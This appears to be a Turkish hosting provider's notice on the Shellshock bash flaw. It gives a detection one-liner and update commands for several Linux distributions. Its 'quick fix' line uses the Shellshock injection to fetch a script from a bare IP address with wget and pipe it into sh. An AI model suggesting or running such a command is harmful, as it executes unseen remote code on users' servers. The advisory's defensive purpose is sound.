Değerli Müşterimiz,
Linux tabanlı sunucularda “Shellshock” isminde bir güvenlik açığı tespit edilmiştir.
Tespit:
Sunucunuzda bu güvenlik açığının olup olmadığını test etmek için;
- Sunucunuza SSH bağlantısı yapın ve aşağıdaki komutu çalıştırın;
env x='() { :;}; echo GuvenliDegil' bash -c 'echo Sunucunuz'
Eğer sunucunuzda güvenlik açığı varsa komutun çıktısı;
GuvenliDegil
Sunucunuz
şeklinde olacaktır.
Sunucunuzda güvenlik açığı yoksa, komutun çıktısı aşağıdaki gibi olacaktır;
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x’
Sunucunuz
Çözüm:
Hızlı Uygulama: env x='() { :;}; wget -qO- http://185.50.68.10/ShUp.php | sh' bash -c 'echo OK'
Güncellemeyi uyguladıktan sonra, yukarıdaki tespit yöntemi ile tekrar test etmelisiniz.
a) Centos işletim sistemi için;
yum update bash komutu ile güncelleme yapabilirsiniz, yada;
- cat /etc/redhat-release komutu ile işletim sistemi versiyonunuza bakın
- uname -a komutu ile işletim sisteminin 32 / 64 bit kontrolünü yapın ve aldığınız bilgilere göre, aşağıda sizin için uygun olan paketi yükleyin;
Centos 6 64bit
rpm -Uvh http://ftp.linux.org.tr/scientific/6x/x86_64/updates/security/bash-4.1.2-15.el6_5.1.x86_64.rpm
Centos 5 64bit
rpm -Uvh http://ftp.linux.org.tr/scientific/59/x86_64/updates/security/bash-3.2-33.el5.1.x86_64.rpm
Centos 5 32bit
rpm -Uvh http://ftp.linux.org.tr/centos/5/updates/i386/RPMS/bash-3.2-33.el5.1.i386.rpm
b) Cloud Linux Kernel işletim sistemi için;
yum clean all
yum update bash
c) Debian işletim sistemi için;
apt-get update
apt-get install –only-upgrade bash
d) Ubuntu işletim sistemi için;
sudo apt-get update && sudo apt-get install bash